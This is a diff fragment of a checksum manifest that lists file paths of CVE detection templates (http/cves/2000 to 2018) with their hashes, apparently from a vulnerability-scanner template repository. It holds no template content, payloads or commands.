-http/cves/2015/CVE-2015-7297.yaml:c4379894b98506ebb680ba2b6be9dac96dd1e0f5 -http/cves/2015/CVE-2015-7377.yaml:908963f2bd78b722eb22912ea1b284abbe5c698a -http/cves/2015/CVE-2015-7450.yaml:4d63fa7a734e1e9e9c4459513d8b64bdcd74ea13 -http/cves/2015/CVE-2015-7780.yaml:915d2f6ac90a4abefb8f31e659e1e856999e1c0c -http/cves/2015/CVE-2015-7823.yaml:58a51152503a725a06b90848dba0478a77191561 -http/cves/2015/CVE-2015-8349.yaml:cc1d145573d9994f6bf030cd2619f1ded18909f0 -http/cves/2015/CVE-2015-8399.yaml:7e5c33c0149fb8386a51dae79a027107554c758e -http/cves/2015/CVE-2015-8813.yaml:5af9a2c3e9b400ada634bea2c77a62c2dce47fb2 -http/cves/2015/CVE-2015-9312.yaml:ca13b80290aecc6e5a192fb4c5f96218c5e61902 -http/cves/2015/CVE-2015-9323.yaml:80b64716501e553a4468758e33e5ce56c6c0b609 -http/cves/2015/CVE-2015-9414.yaml:f29b9d0fad8e1aa76f2db49fb65bf3d5e3ce61ab -http/cves/2015/CVE-2015-9480.yaml:8f96383d4fb93f2825ac0a7246d48f4b2b2d6dcc -http/cves/2016/CVE-2016-0957.yaml:c2a9830a48fe9370588ca0a697194dd9ce92f920 -http/cves/2016/CVE-2016-1000126.yaml:3cc10b21493a0e1dcd0ddfe1ac194da4d21000ee -http/cves/2016/CVE-2016-1000127.yaml:89d323009405585051998165d705de7397ca2af6 -http/cves/2016/CVE-2016-1000128.yaml:a78761cf82d77190b3f5d669ba02d7e43cb9147c -http/cves/2016/CVE-2016-1000129.yaml:c939f75c37eb87060a40eb8d63b68fb7d0551887 -http/cves/2016/CVE-2016-1000130.yaml:0f6b7daef4f3aff877aabe78c32dfdae6bba35d8 -http/cves/2016/CVE-2016-1000131.yaml:b383f9b3340fbbe0e40c140409e2f8aaa3a806d1 -http/cves/2016/CVE-2016-1000132.yaml:6821538bb9fe8e70a46a8ca865b4f6cf7af26c72 -http/cves/2016/CVE-2016-1000133.yaml:f4de7892d84fdc13f6e2c46887d8b6e5e8fa4846 -http/cves/2016/CVE-2016-1000134.yaml:705b9b84bf6dffa5d05902aaed316c4119dfdb93 -http/cves/2016/CVE-2016-1000135.yaml:549c9e25078ccaa2e74aef8aa297029b2df3ce51 -http/cves/2016/CVE-2016-1000136.yaml:cb8380166a98dde36aaf10b40701ca305d0e6375 -http/cves/2016/CVE-2016-1000137.yaml:cabf255bfbeb9b2d4c32638d7ba4f1b959ef25df -http/cves/2016/CVE-2016-1000138.yaml:67d4a7d3a1726a0904dda85a214860e508f661f1 -http/cves/2016/CVE-2016-1000139.yaml:06e5edaa423cbcc8fd2193f6d989442130bfe46c -http/cves/2016/CVE-2016-1000140.yaml:0ebe37cb5486d58b562bf482fb71c662000a591c -http/cves/2016/CVE-2016-1000141.yaml:8484aa61bc1543e89b05e60b86a3957d9888b0ff -http/cves/2016/CVE-2016-1000142.yaml:bbca9deb3d82bca8176130f3f7f538533307688a -http/cves/2016/CVE-2016-1000143.yaml:853ca0bd9f5043ac1e04f3d52aa6fbaf0c4c5814 -http/cves/2016/CVE-2016-1000146.yaml:9518562ede83e349bb76f1e969fb2fc8ed88c4b7 -http/cves/2016/CVE-2016-1000148.yaml:e2cc0e4b4730752e7175c69d1a5660a28eabd140 -http/cves/2016/CVE-2016-1000149.yaml:b3b72ec4c83b1ad9c77c76719d22301efe9f3868 -http/cves/2016/CVE-2016-1000152.yaml:d35f48dd00e5c02f9ebc5cb0e3dde3a195a50d55 -http/cves/2016/CVE-2016-1000153.yaml:ec1b6c48e6423a472addd1e8a6494b6ae1f8a348 -http/cves/2016/CVE-2016-1000154.yaml:618cbda8f258bf4d93819c646d4ec3a1443e986c -http/cves/2016/CVE-2016-1000155.yaml:7dbbbe39e94f1987d654608f27c2997a0e51e8bf -http/cves/2016/CVE-2016-10033.yaml:4c7393c1ee830e3e0787adbad9a79574073641ad -http/cves/2016/CVE-2016-10108.yaml:7e852eb1db5aa609b83534fd7798b18a688ca4a0 -http/cves/2016/CVE-2016-10134.yaml:403028353c1f1e28565f4958019d0e5ea78f182a -http/cves/2016/CVE-2016-10367.yaml:6bed0e6dad48938737d9f00705254585f5c1b52a -http/cves/2016/CVE-2016-10368.yaml:8e6eb9610531a63fdf4fcfb7ebcb8ffbdc1837dc -http/cves/2016/CVE-2016-10924.yaml:bbf2b5bdbcb4f528e295ddf323bfc10a70571ee5 -http/cves/2016/CVE-2016-10940.yaml:c582aea47699d0c16718a733c0f483bc50d90b3c -http/cves/2016/CVE-2016-10956.yaml:4c223d51a10a1786b553417068c18f6edd3e7f00 -http/cves/2016/CVE-2016-10960.yaml:87656c1194ed6e73ee82d28ea0d8432613ded350 -http/cves/2016/CVE-2016-10973.yaml:e300512665dc97b183f1b74dde47adc50abb106d -http/cves/2016/CVE-2016-10993.yaml:b0c57fe3b86fba88cad58e43ac608d4a7484d7fb -http/cves/2016/CVE-2016-1555.yaml:69fc60e9fec2664a5cac4537ac8c761c74010039 -http/cves/2016/CVE-2016-2389.yaml:13d997ae2cfa41bbe1fee44affeaf59380ab46c6 -http/cves/2016/CVE-2016-3081.yaml:7a68f99356e4e943f8bda60cfd64d1c70a190093 -http/cves/2016/CVE-2016-3088.yaml:1fafbca3ae3a26721599bb76f1e7ddbfdea11892 -http/cves/2016/CVE-2016-3978.yaml:eb4a2d8e504b52e3f3484d648772188a2394191d -http/cves/2016/CVE-2016-4437.yaml:5908a55d0c83ed3cb8582132bf647311e195cf41 -http/cves/2016/CVE-2016-4975.yaml:ae5df922ef717377c39531f1187774a4eb53874d -http/cves/2016/CVE-2016-4977.yaml:4594f2c4827606ca4eaa1e757e389fe1721fc858 -http/cves/2016/CVE-2016-5649.yaml:da75c8426630b542a490c271d852369e2f58da0a -http/cves/2016/CVE-2016-6195.yaml:bd8507b0332687f1eddebe352ac44f9fc96baf90 -http/cves/2016/CVE-2016-6277.yaml:836a6bcd6d3599c4d942be15b9a0ded794666640 -http/cves/2016/CVE-2016-6601.yaml:5d2685a6252fcb33ee0a28f959dc874093e801a1 -http/cves/2016/CVE-2016-7552.yaml:9ead4f6d58259e1154333c07a868c37bb2bac0c7 -http/cves/2016/CVE-2016-7834.yaml:c1a2b0ed23d5e84f06b17519a1463a864e6337f6 -http/cves/2016/CVE-2016-7981.yaml:2a319276e3a9efa7a567620cb5b187c36df76b8e -http/cves/2016/CVE-2016-8527.yaml:f4bce94d010b13d050d9192cd5b7025ff9bfff66 -http/cves/2017/CVE-2017-0929.yaml:e262ced378b96c061b1885c2043e375b18a93af8 -http/cves/2017/CVE-2017-1000028.yaml:a42eedcfd9a553df9efc287dc91b03b49a4c0ade -http/cves/2017/CVE-2017-1000029.yaml:51b6b0229ceed1a54bd7bf64a0a338cf5afafed2 -http/cves/2017/CVE-2017-1000163.yaml:4e30cf574bc42eacf97f75d15884309fa1730e71 -http/cves/2017/CVE-2017-1000170.yaml:97c202b916c88955eb61955e7dc0f5678b4665d0 -http/cves/2017/CVE-2017-1000486.yaml:d71dfcd9db8a343c5193125c15e3874a342a9d54 -http/cves/2017/CVE-2017-10075.yaml:3af357bed7fa43c3e3a3b445cab7850d3b253a35 -http/cves/2017/CVE-2017-10271.yaml:a0ee6d68ccfa414d1a75212db0be4f509827dc93 -http/cves/2017/CVE-2017-10974.yaml:d64a4ecacacdd7573dc3b699a1973d0dd11c5c24 -http/cves/2017/CVE-2017-11165.yaml:f2b679f7ee7b20091532b93d84aa9b870560af97 -http/cves/2017/CVE-2017-11444.yaml:0d8a3ed8ea3facf7cadb0161de52e2aa175f979f -http/cves/2017/CVE-2017-11512.yaml:0ff59f12093f3381108632a65a2f188f552f971c -http/cves/2017/CVE-2017-11586.yaml:963cca2b3fa6503d74428a2dcc67279a5d89fda6 -http/cves/2017/CVE-2017-11610.yaml:136878afb05b26f5d1abe08326b2f55b3df36be5 -http/cves/2017/CVE-2017-11629.yaml:465b1bc66f2aad083acf048e4075fa32967c4637 -http/cves/2017/CVE-2017-12138.yaml:443d0ff5cbc741e73fd50348246e2836875d1484 -http/cves/2017/CVE-2017-12149.yaml:a1ad7eea6dba6cddf339af2c7976c8e99406d064 -http/cves/2017/CVE-2017-12542.yaml:d43cbbad39af05e66c5c621b347b31ae556179b4 -http/cves/2017/CVE-2017-12544.yaml:37087a651521c25aa5adbc1e9152b363510de739 -http/cves/2017/CVE-2017-12583.yaml:17fed9ac65f63c218d88c6cf5c6f7a5ee385a7ee -http/cves/2017/CVE-2017-12611.yaml:83dd0c860fd42f7c350b19b734e030823253dce2 -http/cves/2017/CVE-2017-12615.yaml:7fa518da29c363c66269e02644a3b90974227eaf -http/cves/2017/CVE-2017-12617.yaml:02083e1776629afaa46307f2ed4e353921334c21 -http/cves/2017/CVE-2017-12629.yaml:e6fa211194233b91b55ed12303982145b33e04a9 -http/cves/2017/CVE-2017-12635.yaml:bdb62b4c975a5f6b1ed48ad858cd4d42eeb11328 -http/cves/2017/CVE-2017-12637.yaml:e8681061bb055283d549b8aa1bb9c911ed122d45 -http/cves/2017/CVE-2017-12794.yaml:8cb0a81c408ff673bfa53a95c65e712276bd305c -http/cves/2017/CVE-2017-14135.yaml:10db91adb22958cc67135d48b8e9b2851c8cb90e -http/cves/2017/CVE-2017-14186.yaml:59d75f30564f3671ba877c9ca98516d0836666e5 -http/cves/2017/CVE-2017-14524.yaml:dae6abdcbeab59f67b8db52ac8bb653e620efa78 -http/cves/2017/CVE-2017-14535.yaml:8c54c1c0765fa326448b1543212e03947c3e94d6 -http/cves/2017/CVE-2017-14537.yaml:a977baa5805638a196056517f38799b7c74c67d2 -http/cves/2017/CVE-2017-14622.yaml:218b24620aefe0ff14db9ac75b4f743b801b2de1 -http/cves/2017/CVE-2017-14651.yaml:35941017ac55ffa50533c6ea6c299a5396321c1c -http/cves/2017/CVE-2017-14849.yaml:204f4841d9b3e58c0aae23c5fdd5219047ba325b -http/cves/2017/CVE-2017-15287.yaml:260d139c1c7d055d778382b5673880291c15abd6 -http/cves/2017/CVE-2017-15363.yaml:78ce73cd265481804d456bf2c3bde1493f99d3df -http/cves/2017/CVE-2017-15647.yaml:39cc160cf5c3d0b16b8374903c88c625f36d8dc1 -http/cves/2017/CVE-2017-15715.yaml:d608bdaa6e6ab9e44e21044fb3d01e1a59b375fd -http/cves/2017/CVE-2017-15944.yaml:54ddd3750ee4fb7e1b6c386bd32c9dd35babbfae -http/cves/2017/CVE-2017-16806.yaml:2a2311304b88163320355de307c5c2bbd5762467 -http/cves/2017/CVE-2017-16877.yaml:0497feb88a08122cc2d268c86c46c26d7c94939a -http/cves/2017/CVE-2017-16894.yaml:42c22e11aae69662c5f52c05b3a86cd862dbea0b -http/cves/2017/CVE-2017-17043.yaml:06e88d43b5c43646583e62df7d9c0e0f668f7851 -http/cves/2017/CVE-2017-17059.yaml:88d3f6af1e41e5f57845efd89cc92aae3632cc92 -http/cves/2017/CVE-2017-17451.yaml:6debb674f12741a03a6da2776f2b5783ad475f3d -http/cves/2017/CVE-2017-17562.yaml:fde355d6acbd2608938126b85aa2f483e3872325 -http/cves/2017/CVE-2017-17731.yaml:14423e6c8b4e776eab7240a6e1d8a06b02dae2c5 -http/cves/2017/CVE-2017-17736.yaml:f2a12f82c02de2395274f0544f2794c406978f0e -http/cves/2017/CVE-2017-18024.yaml:1651c278bcf2d7bf16a658fc3f50e104c517c7c2 -http/cves/2017/CVE-2017-18536.yaml:e394f28ab566afbea0e854692ad868b1c7b07237 -http/cves/2017/CVE-2017-18598.yaml:f6f2f2f007b7b37b24f3da846bcafd664817ee87 -http/cves/2017/CVE-2017-18638.yaml:a1a218599e1bdf81ba0abe22416219d857c5cdb8 -http/cves/2017/CVE-2017-3506.yaml:fdfff948eea6a68fa42d6bf159ce7245a6e8db64 -http/cves/2017/CVE-2017-3528.yaml:bb917c29ef9489eef5813b5ee4e27e24e83a2e83 -http/cves/2017/CVE-2017-4011.yaml:dc80e2b7a217c37397ee7d5ce64b32c64d647b01 -http/cves/2017/CVE-2017-5487.yaml:fe61a5d6830ca59c3acdeb3e7e7206e5b1ff9c2c -http/cves/2017/CVE-2017-5521.yaml:1eecbb84e2d36ec38f184affb1f005f954c0e723 -http/cves/2017/CVE-2017-5631.yaml:3e33444758b478165b0ec379e5d96b71b2c5f62b -http/cves/2017/CVE-2017-5638.yaml:50e2304a39dcf5260a7ea8c59516b74f2a446e2a -http/cves/2017/CVE-2017-5689.yaml:1958ae78daaa30666bcd029afb87967bb8e037b9 -http/cves/2017/CVE-2017-5982.yaml:3df247cd8d75206cea4ba76a4e0310e74af3eb65 -http/cves/2017/CVE-2017-6090.yaml:cbfda00fbd517f3943de65181880ea5f0af97801 -http/cves/2017/CVE-2017-7269.yaml:ba4c619f63d78ae6f262e010c5784a7484b90c84 -http/cves/2017/CVE-2017-7391.yaml:952c0db814fed2973d4753a7558722cbb45e77ae -http/cves/2017/CVE-2017-7615.yaml:99ecaa9c16b7724584cf36c9dd7aa81eb85a5d0e -http/cves/2017/CVE-2017-7921.yaml:0d26201ccadfea20a6cd4cbbe039d638d3c3c6a8 -http/cves/2017/CVE-2017-7925.yaml:21d8297fde1d8abc2f06a373cab3276da3ea1164 -http/cves/2017/CVE-2017-8229.yaml:6baa09e7c9424ef878227805ccf5477fb87cca8b -http/cves/2017/CVE-2017-8917.yaml:6317862b963213eba47e3efbdec95ef0ec5509e3 -http/cves/2017/CVE-2017-9140.yaml:37414d1b37886443d1183311c0eeb9caba746d0c -http/cves/2017/CVE-2017-9288.yaml:3a9a257d172d872b323fa99c2daa044f5f43c20d -http/cves/2017/CVE-2017-9416.yaml:6d10366e24810687de1eb5561553efb664a4bb74 -http/cves/2017/CVE-2017-9506.yaml:f910386965ae5f15adccdcb9dfc2698304da04bd -http/cves/2017/CVE-2017-9791.yaml:0de4e5596c77020b47c08ed99356df523bfe125a -http/cves/2017/CVE-2017-9805.yaml:2fdbb514201f84923710bce4bd48f8164d131567 -http/cves/2017/CVE-2017-9822.yaml:afcf9a8f13c15484d0eb593f18315fa94c8a694a -http/cves/2017/CVE-2017-9833.yaml:50a69e159942ca5e5ff50e11f52b2ab61a5804c5 -http/cves/2017/CVE-2017-9841.yaml:143ec0e82f648bfec71a57a851ef23700321d216 -http/cves/2018/CVE-2018-0127.yaml:e46c425c4b9f3d6421e1d6895a8d9298da3b7999 -http/cves/2018/CVE-2018-0296.yaml:6c4d52a52db5607c40aeb721a13c7a49fdc7b21f -http/cves/2018/CVE-2018-1000129.yaml:a539e9834a7b7607841878954192fff80b2afa12 -http/cves/2018/CVE-2018-1000130.yaml:06ed7c324cd4eee72621a3cde3f233c99db7baf5 -http/cves/2018/CVE-2018-1000226.yaml:89b102d7327cc79316f92c5b321a921107f4d72d -http/cves/2018/CVE-2018-1000533.yaml:1653e1f0e824c08518058dbeda1d2059f9a33dc5 -http/cves/2018/CVE-2018-1000600.yaml:ac40946fd5c5d55b300fde85b42abd8389dc1ddd -http/cves/2018/CVE-2018-1000671.yaml:7d7d501d29d4fcb63a6df03b62044dce66ca6aeb -http/cves/2018/CVE-2018-1000856.yaml:e8eecd8c2ce68ce8c805dd3ab9da8ca3c248969b -http/cves/2018/CVE-2018-1000861.yaml:5bfcf6484e8e00a73997dc5983dfd854c6ef03fd -http/cves/2018/CVE-2018-10093.yaml:cc866684eb12cd70f8b7906236405251c84fd75d -http/cves/2018/CVE-2018-10095.yaml:c7a9bb5329f8fe758bd2093438dd7eaedd79d9e2 -http/cves/2018/CVE-2018-10141.yaml:83232f018e002e7f43307b0808daa4a31f599cc5 -http/cves/2018/CVE-2018-10201.yaml:8543b84c75f08267837ac7e9e161f489b37f62da -http/cves/2018/CVE-2018-10230.yaml:b107962f6c504e3be8331c81bbf255990a7a0a51 -http/cves/2018/CVE-2018-10562.yaml:65b24e61835ba7dc8f6b5e903a126bd698b8076e +http/cves/2000/CVE-2000-0114.yaml:fcd8e8015db69aaba7323d20ef4834bd34fd4346 +http/cves/2001/CVE-2001-0537.yaml:f828a1bb3fb196d8fbc7c6cb30d44af702685156 +http/cves/2002/CVE-2002-1131.yaml:12ad891bdc82a3f86d726abb8f60634c7ee66a98 +http/cves/2004/CVE-2004-0519.yaml:754df65149823fb1a00965ecdcf6c035ac055477 +http/cves/2004/CVE-2004-1965.yaml:c6bbff33a77656d5915c74864c19b9b96469e3ec +http/cves/2005/CVE-2005-2428.yaml:81a6b7269c5778501b4a88d1aa881549b1566473 +http/cves/2005/CVE-2005-3344.yaml:ee476d5b4867277546b61c3b763ebc86d1805523 +http/cves/2005/CVE-2005-3634.yaml:18c119dd04b56fc55e2b557d2240907ce39827ab +http/cves/2005/CVE-2005-4385.yaml:7a55fa9ff9ffa9ce97b5057368084522caa082c5 +http/cves/2006/CVE-2006-1681.yaml:dc2b44c10fb6a72ba9e28a8e4ba4b2070bcf9a51 +http/cves/2006/CVE-2006-2842.yaml:5cd21082cfa348796da46f0dc5b4a2c5060f6c79 +http/cves/2007/CVE-2007-0885.yaml:5d705b5a08f20145996434a34b7ea597f7113cad +http/cves/2007/CVE-2007-4504.yaml:448f34c541739a3de0780799e03b7a98fea9136a +http/cves/2007/CVE-2007-4556.yaml:bcf33151d33a00b651c008a165c61ff243565d24 +http/cves/2007/CVE-2007-5728.yaml:6ac5d779dd7fef31e358315098a15a800cf5c078 +http/cves/2008/CVE-2008-1059.yaml:be30b0cd1d52b19408f6bbb0e15515db87ff7f53 +http/cves/2008/CVE-2008-1061.yaml:a90a799bdd46f6a6be0b599cf5d36bce674d5105 +http/cves/2008/CVE-2008-1547.yaml:c887729ae5d5c691febdbecad3ea9051e17286a8 +http/cves/2008/CVE-2008-2398.yaml:0576017be9ee137d1615f216610a38ffa57b0df0 +http/cves/2008/CVE-2008-2650.yaml:b1b3d7bfa81d97eab89a618280ebf0443a5c1c5b +http/cves/2008/CVE-2008-4668.yaml:ba68f89f73a9c876e2c57f115b2dd9c44af46ebe +http/cves/2008/CVE-2008-4764.yaml:6614e223a1a0b71d911bea9db40b8a1f92f814e7 +http/cves/2008/CVE-2008-5587.yaml:9b9d714dced81e22edd9a4ccd6a858a27e26897b +http/cves/2008/CVE-2008-6080.yaml:8953e0111902369396fd7a86175174008fbed7ae +http/cves/2008/CVE-2008-6172.yaml:ff0ebde9d75c67cc9c93a51c853afa75d3695f6d +http/cves/2008/CVE-2008-6222.yaml:af5a95deeaf6bb64b31960cd005ab29831525086 +http/cves/2008/CVE-2008-6465.yaml:0336c45f66e745ea6303a153fc4b3162df67813d +http/cves/2008/CVE-2008-6668.yaml:8b5902d6abab5f35ed80d652c1cc6da8a25740e3 +http/cves/2008/CVE-2008-6982.yaml:2f43aa36b07f946ab0ec7da49112bfe18e0e5b46 +http/cves/2008/CVE-2008-7269.yaml:a5d67894f862bd1f87c7b145b5c29754b516362a +http/cves/2009/CVE-2009-0347.yaml:87825ec46dede61cf9fbbd08ddcfe19c2dc72a11 +http/cves/2009/CVE-2009-0545.yaml:1510f6d1c547caaa806eafcbe14076cbb17f9060 +http/cves/2009/CVE-2009-0932.yaml:11b0e7c770be8736dae9b24b1416f4516dc4ba26 +http/cves/2009/CVE-2009-1151.yaml:eac16836a03c2598f5fcd7d66b434fbdc1dbe1ea +http/cves/2009/CVE-2009-1496.yaml:7f9acebfddce10f1be6cf4733a4e5778a538956c +http/cves/2009/CVE-2009-1558.yaml:d2369f0bb1e32de1c91605406524a4b2677d4a46 +http/cves/2009/CVE-2009-1872.yaml:7de9c2238e6092aef425fc76e17a8c621d1ca703 +http/cves/2009/CVE-2009-2015.yaml:16218496eb4da369c28a9294b6fb007a10269aaa +http/cves/2009/CVE-2009-2100.yaml:16523fdef3f0ef3643be8d33dcad9ebf052a36aa +http/cves/2009/CVE-2009-3053.yaml:e29b5bdfe0a0625a7584867f6bb78ccf47bb5a53 +http/cves/2009/CVE-2009-3318.yaml:8fa9b325d46dbdbb77cdb5a123e7c12e98db81d1 +http/cves/2009/CVE-2009-4202.yaml:161dd5d71e343f0b97d72f150d22c1c787f746b7 +http/cves/2009/CVE-2009-4223.yaml:6eadfae7bb56559ce4f8b419ccc5b91b16ca91ea +http/cves/2009/CVE-2009-4679.yaml:ef2f0e6629f00c88c369fb88c596c5bdb725b5f9 +http/cves/2009/CVE-2009-5020.yaml:3282c8c32d7b83402cc3e0ea2913856e104e2390 +http/cves/2009/CVE-2009-5114.yaml:2480b1b870782db3cc92e899dc3c0ee487beb960 +http/cves/2010/CVE-2010-0157.yaml:395276e3cb043b9e0875e84ea69e5055c847eb41 +http/cves/2010/CVE-2010-0219.yaml:c897c3583d77c7649e4e61aa267c2046e2cee1ec +http/cves/2010/CVE-2010-0467.yaml:122545a02e8ea3ef0dfb07597df72a13c8569f7e +http/cves/2010/CVE-2010-0696.yaml:ddfbcda84cecd925a5170fee0a333f730c221d79 +http/cves/2010/CVE-2010-0759.yaml:c90d869842c21c4c0aed147b88716531934775e9 +http/cves/2010/CVE-2010-0942.yaml:7b84f808c59626c7a233c25946e289077dc7bbe9 +http/cves/2010/CVE-2010-0943.yaml:30a38c2f08b063aba309df6003a67d92221cee7e +http/cves/2010/CVE-2010-0944.yaml:58a6922d4f8477c0f198c7c572e8da94e2a84729 +http/cves/2010/CVE-2010-0972.yaml:274d55fa676f2fea5fd65ef08290f780e6e1e78e +http/cves/2010/CVE-2010-0982.yaml:04e103d507e7bcb04508b2960fd6f46282cc5a68 +http/cves/2010/CVE-2010-0985.yaml:78a23057dcd3e6ec9855d1c65a3aa5a844d7ee90 +http/cves/2010/CVE-2010-1056.yaml:7fd6a59de39f098b978069b8fc16285785021f0c +http/cves/2010/CVE-2010-1081.yaml:476ad6f966028dc447a011cd37da4461b6fd61de +http/cves/2010/CVE-2010-1217.yaml:5a32c96dd9e65b3bf523fbe6d2eda19a058b2e58 +http/cves/2010/CVE-2010-1219.yaml:77c0fe131905317bf0bc9e6a7b456ce9ac700e8d +http/cves/2010/CVE-2010-1302.yaml:ae9b81301428b564d4ca202063a0be8fbce1517c +http/cves/2010/CVE-2010-1304.yaml:c4f9f902b278e456a4d38b23f6fc1ddb55a04ca5 +http/cves/2010/CVE-2010-1305.yaml:824f8975931f674c1fa7bc895b6f4dca0acb9afe +http/cves/2010/CVE-2010-1306.yaml:3db2bf054eaaf025599e17b5b240824941198be6 +http/cves/2010/CVE-2010-1307.yaml:3aa093dd68bc97439134acc05824b7e50f3db102 +http/cves/2010/CVE-2010-1308.yaml:32e8d7416d537d301ce8c8fef3724e57a1ec21a5 +http/cves/2010/CVE-2010-1312.yaml:d9b3aaa664fba3d809d1b703498d32a6c6368a78 +http/cves/2010/CVE-2010-1313.yaml:8688b00fd8a2ba46f703369db6659c7059ed2b98 +http/cves/2010/CVE-2010-1314.yaml:cd00a726f9096e5d4dd094cf84c37e6104fa072f +http/cves/2010/CVE-2010-1315.yaml:014262c0a3f953ddfaa27e46f60ee4805f22ec44 +http/cves/2010/CVE-2010-1340.yaml:5c79a3de8df3c6d37fa83f0859d2185c1738937c +http/cves/2010/CVE-2010-1345.yaml:ca77ae26c338fb5da53b5b6c52fbb0d0ae505db1 +http/cves/2010/CVE-2010-1352.yaml:d977213071cd97df28f211df7a5d898c7d424abc +http/cves/2010/CVE-2010-1353.yaml:8477fd57011572f58c855667290b3da5539b1528 +http/cves/2010/CVE-2010-1354.yaml:922c368cace625c0d8756e10a5f05f40112b3bc3 +http/cves/2010/CVE-2010-1429.yaml:220282a45049e8103bbe294408cd2dafad4b8d55 +http/cves/2010/CVE-2010-1461.yaml:b02d8f387518cdcde0404d6049b089053ba4e822 +http/cves/2010/CVE-2010-1469.yaml:1d58a97e4e17147f22ccbad68df51c8629f1eb90 +http/cves/2010/CVE-2010-1470.yaml:6a83a940ae16c39c0cb757a2dcac6dbf84f20945 +http/cves/2010/CVE-2010-1471.yaml:49d539ac0839fa80204270d2f36dc48b778402ef +http/cves/2010/CVE-2010-1472.yaml:8980f43f45cd3c9585e49344aa9296a34586afcc +http/cves/2010/CVE-2010-1473.yaml:137a6f558a2dc3870b8085bf8017455a567c72a1 +http/cves/2010/CVE-2010-1474.yaml:8503a0a15f642ba67010074b40c5cfff5d43c44d +http/cves/2010/CVE-2010-1475.yaml:1d4382d68955361d65c2c4bace192d147dd644f3 +http/cves/2010/CVE-2010-1476.yaml:9e9fbc87f0bf96e13a49fd55ae9f783a53f48bb0 +http/cves/2010/CVE-2010-1478.yaml:bee6adc3561506e228af3fa521697a45eddd0dff +http/cves/2010/CVE-2010-1491.yaml:52e8c1a631cce83c258d0527d6dd21491f4d3ad3 +http/cves/2010/CVE-2010-1494.yaml:9956656f0502d09d4b903688f598efde6057b08f +http/cves/2010/CVE-2010-1495.yaml:15f6ea613248a1243bf6b5e1003627419f52ef49 +http/cves/2010/CVE-2010-1531.yaml:94476f2fc7fcc6d645191e87623d094cd7fc24c5 +http/cves/2010/CVE-2010-1532.yaml:3176d00bc3df83261fd39c93db67e1421b61747f +http/cves/2010/CVE-2010-1533.yaml:a9759bfdb959b43322bde710785644e68edbd920 +http/cves/2010/CVE-2010-1534.yaml:1ef1c244b94bad06672f95e518aa4604ca2e4295 +http/cves/2010/CVE-2010-1535.yaml:9a49365f154098f52c630662b5688b3bbf0a47e7 +http/cves/2010/CVE-2010-1540.yaml:c3b3a0f944f0c585f62e7ba92ba5f0cab5425e76 +http/cves/2010/CVE-2010-1586.yaml:13a63404d665bb84e120be31d5420737ae16fbc7 +http/cves/2010/CVE-2010-1601.yaml:605458b2a25fa484d1a6e7bdb5279823177483e9 +http/cves/2010/CVE-2010-1602.yaml:7998c5a4122dd3a17924879ee234efc1a6c049ea +http/cves/2010/CVE-2010-1603.yaml:e568ce207de8b7a004c46ea341a8fbffc92c3c76 +http/cves/2010/CVE-2010-1607.yaml:84f8fca4e992e0c30b7ac852d021a723c38008fe +http/cves/2010/CVE-2010-1653.yaml:a99702c66a324dc473f0feb42b7e53c11b5305e4 +http/cves/2010/CVE-2010-1657.yaml:46c8c356d8c0d100bc02a58a25c5597cc1dc352d +http/cves/2010/CVE-2010-1658.yaml:673e2495a10b80c7d9486e2b9e200a04ae1c5090 +http/cves/2010/CVE-2010-1659.yaml:394693ddd68181a2256c65090206afc3fb8a98b4 +http/cves/2010/CVE-2010-1714.yaml:1b00b30acd53699db831af771071554742a0d59d +http/cves/2010/CVE-2010-1715.yaml:34bc970686a47331c444afe0f6810911994616a9 +http/cves/2010/CVE-2010-1717.yaml:709500b5620c837b593269158720eb1ec56eee28 +http/cves/2010/CVE-2010-1718.yaml:d3552deab4a54a4e8be84b7a1c9a361c6b9f63de +http/cves/2010/CVE-2010-1719.yaml:481539b1ff506829b868515db77269a28fd5c02d +http/cves/2010/CVE-2010-1722.yaml:1b54c11a5705fe701c563fde9137025015b86205 +http/cves/2010/CVE-2010-1723.yaml:5265f4d18cd05481aec0a25bdb5d6936fee86a41 +http/cves/2010/CVE-2010-1858.yaml:d7e10aebb01a4417b34c2e79e30953c259d001c9 +http/cves/2010/CVE-2010-1870.yaml:14e79e1569c497aac97b58a2a10d704db5c51786 +http/cves/2010/CVE-2010-1875.yaml:0d9165bc6db1bee339582f0d990414a104f92d5d +http/cves/2010/CVE-2010-1878.yaml:ac931cd0d43f203651c4e27b9f08cb8eb1aabe83 +http/cves/2010/CVE-2010-1952.yaml:fa1dbe86e6892dd05421889c67b275bdffab2567 +http/cves/2010/CVE-2010-1953.yaml:6f636d06119fcc887026a1d79819b59e8d044160 +http/cves/2010/CVE-2010-1954.yaml:899cc456a5e6bcb267198d67ee05ae5ced33bb06 +http/cves/2010/CVE-2010-1955.yaml:fef9934d4de1ff2c2fcc77726f0428c9867dbb3e +http/cves/2010/CVE-2010-1956.yaml:c203b9a329440f9b76d488edcea9b644807bae4f +http/cves/2010/CVE-2010-1957.yaml:9df1bee0dbbbd3420b7a879da97259ea41c9ec63 +http/cves/2010/CVE-2010-1977.yaml:aa78b3c48712a7863bfe941ed638f425cc1262f7 +http/cves/2010/CVE-2010-1979.yaml:cae77345b63af755d1dc8752a72a836c510e5e6a +http/cves/2010/CVE-2010-1980.yaml:a8f798d7fcf1c61f99c9bbd19ad846a0f0d4015a +http/cves/2010/CVE-2010-1981.yaml:b413f01840bd3cb7028387ec63a2963caa5fb299 +http/cves/2010/CVE-2010-1982.yaml:1ce7b86190fec13a81a06721b8529af49a887fe7 +http/cves/2010/CVE-2010-1983.yaml:90cf867c00d926d105910fb8b1b8154f7b9ec787 +http/cves/2010/CVE-2010-2033.yaml:269cce4212a32f096b37f660726f76f1f985c8c2 +http/cves/2010/CVE-2010-2034.yaml:e17abca62211ea724ec42e92dce9f5fd084bf284 +http/cves/2010/CVE-2010-2035.yaml:c50f3a36d1f194f4652d58adce3061464e72c939 +http/cves/2010/CVE-2010-2036.yaml:d45bce5a55ffd0501cd13a65ec828aaef8605b96 +http/cves/2010/CVE-2010-2037.yaml:1a7f83fa1e946622e3bf8ec17acc75c53050b4ae +http/cves/2010/CVE-2010-2045.yaml:5be8e622ef32aebf73d60fcda8380f30e195c0ed +http/cves/2010/CVE-2010-2050.yaml:9da00e874195a830e55ae36aa1261166b73d71da +http/cves/2010/CVE-2010-2122.yaml:197efa9d9d8c1405dfd5c17b03621b1b14d1331b +http/cves/2010/CVE-2010-2128.yaml:b44e6fa07ac3499bfb1c1e0375860fb5841839a3 +http/cves/2010/CVE-2010-2259.yaml:b490d1239e3503f97829ceb9e4e0d7f85ca5dd14 +http/cves/2010/CVE-2010-2307.yaml:838d14a755408f8a5874b99cd433f2351cac8f97 +http/cves/2010/CVE-2010-2507.yaml:f2efa9ff948eff536d5e4f38d20981effcf99c75 